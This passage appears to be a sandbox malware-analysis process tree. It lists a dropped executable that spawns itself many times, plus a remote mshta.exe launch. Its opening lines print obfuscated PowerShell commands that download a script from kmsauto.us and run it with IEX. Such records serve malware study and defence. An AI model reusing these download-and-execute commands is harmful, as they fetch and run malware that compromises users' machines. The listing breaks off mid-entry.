        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ra/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
        5⤵
        
        PID:18780
- - C:\Users\Admin\AppData\Local\Temp\3zxiSPdq.com
    "C:\Users\Admin\AppData\Local\Temp\3zxiSPdq.com"
    3⤵
    PID:4228
  - - C:\Windows\System32\mshta.exe
      "C:\Windows\System32\mshta.exe" https://kmsauto.us/Encoding.txt
      4⤵
      PID:8688
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $A='DowRing'.Replace('R','nloadstr');$B = 'WebCAMt'.Replace('AM','lien');$d='tnt'.Replace('tn','Ne');$link ='https://kmsauto.us/ALL.txt';$t1='(New-OS'.Replace('S','bje');$t2='ct Sypek)'.Replace('pe','stem.$d.$B).$A($lin');$WC=I`E`X ($t1,$t2 -Join '')|I`E`X
        5⤵
        
        PID:16412
- C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
  "C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3696
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    - Executes dropped EXE
    PID:4572
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    - Executes dropped EXE
    PID:4972
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    - Executes dropped EXE
    PID:3600
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    - Executes dropped EXE
    PID:4688
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    - Executes dropped EXE
    PID:4876
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    - Executes dropped EXE
    PID:4568
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    - Executes dropped EXE
    PID:5292
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    - Executes dropped EXE
    PID:5660
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    - Executes dropped EXE
    PID:6052
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    - Executes dropped EXE
    PID:5420
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:5972
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:1760
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:4460
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:6084
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:2188
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:6396
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:6852
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:6316
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:6980
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:4316
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:6384
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:4712
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:7532
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:7852
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    - Suspicious use of SetThreadContext
    PID:4000
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:7736
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:5508
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:7992
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:8588
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:8972
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:7136
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:2952
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:8524
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:9420
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:9988
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:9456
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:6484
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:9812
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:8596
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:10028
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:4548
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:10376
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:10692
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:10980
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:1804
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:10640
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:10944
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:10896
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:9736
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:6640
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:10512
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:7632
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:11420
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:11796
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:12284
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:11772
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:12048
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:8540
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:7616
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:11712
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:11648
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:10040
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:12512
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:12864
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:928
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:12752
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:12456
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:13152
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:928
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:6224
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:11252
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:13572
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:13864
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:14144
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:13432
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:11816
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:14208
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:14168
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:13800
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:14224
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:5016
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:2356
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:14516
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:14940
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:14556
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:15080
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:14676
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:13928
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:6824
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:11804
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:15448
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:15816
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:16208
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:15664
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:15172
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:7064
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:12832
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:4920
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:11104
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:932
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:5276
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:7464
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:14368
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:16520
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:16932
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:17372
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:16920
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:16548
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:15496
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:15824
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:17052
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:17648
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:18048
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:5740
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:17920
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:6168
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:18036
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:18420
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:12336
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:15952
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:18712
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:19068
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:19452
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:19000
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:15992
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:18568
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:17100
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:15820
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:19600
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:20040
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:20424
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:19792
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:6148
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:20200
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:19700
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:18412
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:15680
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:20516
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:20948
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:21268
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:20684
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:21260
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
    3⤵
    PID:18392
- - C:\Users\Admin\Documents\qp7J1NYdd0R8dKOpPGZH36rL.exe
